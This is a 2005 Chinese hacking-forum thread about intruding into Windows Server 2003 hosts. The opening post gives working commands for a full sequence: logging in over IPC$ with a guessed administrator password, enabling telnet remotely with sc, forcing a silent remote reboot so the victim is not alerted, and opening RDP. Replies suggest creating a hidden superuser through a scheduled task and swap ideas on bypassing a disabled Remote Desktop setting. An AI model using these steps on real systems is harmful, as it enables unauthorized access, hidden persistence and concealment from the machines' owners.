标题:
关于2003系统的入侵问题(讨论并请教)
[打印本页]
作者:
woshihaike
时间:
2005-5-30 14:55
标题:
关于2003系统的入侵问题(讨论并请教)
入侵一台2000的主机有很多办法,那么入侵2003操作系统的主机方法有多少。
本人入侵的方法如下(我还是喜欢用命令呵~~)
1)用流光或其它软件扫到有弱口令的主机,然后用在命令行里输入
net use \\ip\ipc$“密码”/use:"administrator"
显示命令成功。
2)用SC命令打开telnet(2003版本强烈支持这个命令)
sc \\ip config tlntsvr start =auto
上面的tlntsvr是telnet的服务器名,大家可以打“管理工具”的“服务”查看
后面的auto是参数.表示每次计算机重启时,甚至没有人登陆时,都可以自动开始服务。
sc的命令大家可以去帮助里查找,里面写的很详细~~~我就不废话了
3)用shutdown命令进行重起,注意这个命令要把时间设置为0秒,要不然会在入侵的主机屏幕显示出来,那你也就暴光了
shutdown /r /m \\ip /t 0 /f /d p:4:1
上面的r参数的关机后重启, M参数是远程连接 T参数是时间,把它设置为0秒 F参数是强制把正在运行的程序关闭而且不提前警告用户
4)等机子起来后你会发现telnet服务已经打开了,呵呵,连上去哈。把3389端口打开,这个大家都知道怎么开把,我就不废话了
本人在入侵2003的主机时遇见一个问题,telnet上去了,3389打开了,可远程桌面连不上去(不是用户限制问题,出现的是远程连接失败,系统提示用户名或密码不正确。)
后来我找到失败原因,对方在“我的电脑”属性里把禁止了远程桌面连接,
!1) 请问怎么才可以把禁止取消,从远程桌面连接上去。(这个我也没有搞明白,知道的请回贴了,多谢了)
作者:
坏的刚刚好
时间:
2005-5-30 16:30
标题:
关于2003系统的入侵问题(讨论并请教)
觉得用at命令下远程建立隐藏的超级用户
它所产生的计划任务是以系统的身份运行的
作者:
woshihaike
时间:
2005-5-30 16:38
标题:
关于2003系统的入侵问题(讨论并请教)
恩,刚才我把你说的意思做了,但没有用,登陆的就是超级用户,而且就是Administrator , 但还是失败,斑竹要是知道怎么开,把详细步骤说说,懂与不懂全在一念之间.
作者:
chinanic
时间:
2005-5-30 19:33
标题:
关于2003系统的入侵问题(讨论并请教)
这个问题我也遇到过,猜测是对方设置了远程桌面连接的3389端口只对应某个IP开放,或改了端口!
作者:
woshihaike
时间:
2005-5-30 22:50
标题:
关于2003系统的入侵问题(讨论并请教)
端口没有改,我跟我朋友试过了,telnet上去了,3389端口没有改变,组策略和本地策略都没有限制.就是在"我的电脑"的属性里把"远程桌面"的选项打了个勾,禁止别的的主机连接.远程桌面就是没有上去,我就纳闷了.
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2
